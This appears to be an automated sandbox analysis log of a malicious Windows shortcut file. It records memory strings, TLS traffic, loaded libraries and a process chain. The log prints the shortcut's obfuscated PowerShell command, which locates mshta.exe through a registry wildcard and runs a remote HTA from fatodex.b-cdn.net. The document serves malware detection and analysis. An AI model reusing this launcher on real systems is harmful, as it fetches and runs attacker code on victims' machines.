Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff2)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff2)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff2)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff2)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff2)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff2)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff2)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff2)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-7
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff2)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-900-normal.woff)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-900-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-400-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-400-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff2)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff2)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff2)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff2)
Source: mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-500-normal.woff)
Source: css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-500-normal.woff2)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff2)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff)
Source: mshta.exe, 00000003.00000002.3359913108.0000024D3BBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167044857.0000024D3BBD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2167110025.0000024D3BBCF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3359913108.0000024D3BBB4000.00000004.00000020.00020000.00000000.sdmp, css[1].css.3.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff2)
Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000005.00000003.2169104061.000001E64E3A0000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 138.199.37.232:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.37:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.38:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.236.104:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.39:443 -> 192.168.2.6:49717 version: TLS 1.2

System Summary

barindex
Source: PDp2UpMXz1.lnkLNK file: .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://fatodex.b-cdn.net/fatodex
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal100.winLNK@5/14@5/6
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\css[1].htmJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_we5q3paz.e1z.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: PDp2UpMXz1.lnkVirustotal: Detection: 41%
Source: PDp2UpMXz1.lnkReversingLabs: Detection: 44%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://fatodex.b-cdn.net/fatodex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodex
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodexJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
